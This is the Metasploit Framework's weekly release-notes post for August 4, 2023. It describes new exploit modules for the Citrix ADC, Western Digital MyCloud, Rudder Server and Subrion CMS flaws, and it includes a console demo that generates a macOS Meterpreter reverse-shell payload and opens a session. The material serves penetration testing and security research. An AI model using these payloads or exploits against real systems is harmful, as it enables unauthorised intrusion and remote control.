Metasploit Weekly Wrap-Up: Aug. 4, 2023

Last updated at Tue, 23 Jan 2024 21:46:08 GMT

Fly High in the Sky With This New Cloud Exploit!

This week, a new module was added that takes advantage of both authentication bypass and command injection in certain versions of Western Digital's MyCloud hardware. Submitted by community member Erik Wynter, this module gains access to the target, attempts to bypass authentication, verifies whether that was successful, then executes the payload with root privileges. This works on versions before 2.30.196, and offers a lot of flexibility in just a few commands. See the original PR for more info!

OSX Meterpreter support for M1 and M2 devices

Thanks to the great work of usiegl00, Metasploit now has payload support for both M1 and M2 Arm64 devices that run without the x64 Rosetta emulator being installed on the target machine.

The new payloads are:

• osx/aarch64/meterpreter/reverse_tcp
• osx/aarch64/meterpreter_reverse_https
• osx/aarch64/meterpreter_reverse_tcp
• osx/aarch64/meterpreter_reverse_http

Example of generating a payload:

msf6 > use payload/osx/aarch64/meterpreter_reverse_tcp
msf6 payload(osx/aarch64/meterpreter_reverse_tcp) > generate -f macho -o /Users/user/Desktop/payload_stageless LHOST=127.0.0.1
[*] Writing 812819 bytes to /Users/user/Desktop/payload_stageless...

After executing the payload on the remote host, the session will open and can be interacted with:

msf6 payload(osx/aarch64/meterpreter_reverse_tcp) >
[*] Transmitting first stager...(328 bytes)
[*] Transmitting second stager...(65536 bytes)
[*] Sending stage (812819 bytes) to 127.0.0.1
[*] Meterpreter session 8 opened (127.0.0.1:4444 -> 127.0.0.1:49167) at 2023-07-31 16:19:23 -0500

msf6 payload(osx/aarch64/meterpreter_reverse_tcp) > sessions -i -1
[*] Starting interaction with 5...

meterpreter > getuid
Server username: demo
meterpreter > sysinfo
Computer     : demo.local
OS           : macOS Ventura (macOS 13.2.0)
Architecture : arm64
BuildTuple   : aarch64-apple-darwin
Meterpreter  : aarch64/osx
meterpreter >

Metasploit takes to the road

Next week, part of the Metasploit team will be in Las Vegas for Black Hat, BSides Las Vegas and DEF CON. Our own Spencer McIntyre will be demonstrating some of the latest Metasploit features and workflows for targeting Active Directory at both Black Hat and DEF CON. Be sure to stop by and check it out. We’ll also be giving out the local currency of stickers.

• Black Hat on Thursday, August 10th at 13:00-14:30 in the Business Hall
• DEF CON on Friday, August 11th at 10:00-12:00 in the Committee Boardroom

New module content (10)

Citrix ADC (NetScaler) Forms SSO Target RCE

Authors: Douglass McKee, Ron Bowes, and Spencer McIntyre
Type: Exploit
Pull request: #18240 contributed by zeroSteiner
Path: exploits/freebsd/http/citrix_formssso_target_rce
AttackerKB reference: CVE-2023-3519

Description: This adds an exploit for CVE-2023-3519 which is an unauthenticated RCE in Citrix ADC. By making a specially crafted HTTP GET request, an attacker can trigger a stack buffer overflow within the nsppe process which runs as root.

Western Digital MyCloud unauthenticated command injection

Authors: Erik Wynter, Remco Vermeulen, and Steven Campbell
Type: Exploit
Pull request: #18221 contributed by ErikWynter
Path: exploits/linux/http/wd_mycloud_unauthenticated_cmd_injection
AttackerKB reference: CVE-2018-17153

Description: This adds an exploit module for an authentication bypass (CVE-2018-17153) and a command injection (CVE-2016-10108) vulnerabilities in Western Digital MyCloud before 2.30.196. The module first performs a check to validate if the target is vulnerable by attempting to leverage an authentication bypass followed by injecting a simple echo command. If the target is confirmed to be vulnerable, the module leverages the same command injection vulnerability to execute the payload with root privileges.

Rudder Server SQLI Remote Code Execution

Author: Ege Balcı
Type: Exploit
Pull request: #18205 contributed by EgeBalci
Path: exploits/multi/http/rudder_server_sqli_rce
AttackerKB reference: CVE-2023-30625

Description: This adds an exploit module that leverages an SQL injection vulnerability (CVE-2023-30625) in RudderStack's rudder-server to achieve unauthenticated remote code execution. The vulnerability affects versions of rudder-server before 1.3.0-rc.1.

Intelliants Subrion CMS 4.2.1 - Authenticated File Upload Bypass to RCE

Authors: Fellipe Oliveira, Hexife, and Ismail E. Dawoodjee
Type: Exploit
Pull request: #18211 contributed by ismaildawoodjee
Path: exploits/multi/http/subrion_cms_file_upload_rce
AttackerKB reference: CVE-2018-19422

Description: This adds an exploit module that leverages an authenticated file upload vulnerability in Subrion CMS versions 4.2.1 and prior. Due to an issue in the way the .htaccess file is configured by default, it is possible to upload PHP code to the web server and achieve remote code execution.

AWS Instance Connection

Author: sempervictus
Type: Payload
Pull request: #17600 contributed by sempervictus
Path: payloads/singles/cmd/unix/bind_aws_instance_connect

Description: This adds AWS instance connection sessions.

OSX AArch64 Payload Support

Author: usiegl00
Type: Payload
Pull request: #17129 contributed by usiegl00
Path: payloads/singles/osx/aarch64/meterpreter_reverse_http

Description: Adds new support for multiple OSX AArch64 payloads: osx/aarch64/meterpreter/reverse_tcp, osx/aarch64/meterpreter_reverse_https, osx/aarch64/meterpreter_reverse_tcp, osx/aarch64/meterpreter_reverse_http. This enables the use of native payloads on M1 or M2 OSX devices that do not have Rosetta installed.

Enhancements and features (4)

• #18223 from adfoster-r7 - This PR fixes broken msfconsole command history management when switching between shell sessions.
• #18239 from h00die - Adds verified version numbers (1.12.1, 1.12.1-RC2, and 1.20.0) to the exploits/multi/http/apache_nifi_processor_rce RCE module.
• #18249 from adfoster-r7 - Provide better error messages when failing to load Mettle extensions, such as the extended API extapi.
• #18255 from adfoster-r7 - Removes Python2 support from the Metasploit docker container now that it is officially end of life, and no longer used by Metasploit. Python3 support remains available.

Bugs fixed (6)

• #18203 from adfoster-r7 - Fixes a crash when running the scanner/ssh/libssh_auth_bypass module on newer versions of Ruby.
• #18209 from adfoster-r7 - This fixes an issue in the windows/local/bypassuac_comhijack exploit module, which was breaking due to a syntax error.
• #18234 from D00Movenok - This fixes a bug in the 64-bit messagebox payload where it would fail to execute if user32 was not already loaded.
• #18238 from dwelch-r7 - Fixes an issue where when setting USERNAME, USER_FILE and PASS_FILE with scanner modules. Previously the first username in the USER_FILE would not be tested against any password in PASS_FILE, this is now fixed.
• #18243 from adfoster-r7 - This PR fixes an issue were an appscan import would fail due to an empty proof.
• #18248 from adfoster-r7 - Fix bootup warning when running the JSON msfrpc service.

Documentation

You can find the latest Metasploit documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

• Pull Requests 6.3.27...6.3.28
• Full diff 6.3.27...6.3.28

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).